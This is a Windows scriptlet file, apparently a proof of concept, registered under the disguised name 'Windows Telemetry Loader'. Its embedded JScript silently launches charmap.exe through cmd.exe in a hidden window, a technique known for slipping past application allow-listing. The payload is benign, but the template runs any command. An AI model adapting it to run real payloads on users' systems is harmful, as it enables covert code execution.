<?xml version="1.0"?>
<scriptlet>
<registration
    description="Windows Telemetry Loader"
    progid="Telemetry.Loader"
    version="1.00"
    classid="{F9E2A0D0-1234-5678-9ABC-DEF012345678}"
>
</registration>

<script language="JScript">
<![CDATA[
// Simple PoC: launch charmap.exe via cmd
var obj = new ActiveXObject("WScript.Shell");
obj.Run("cmd.exe /c start charmap.exe", 0, false);
]]>
</script>
</scriptlet>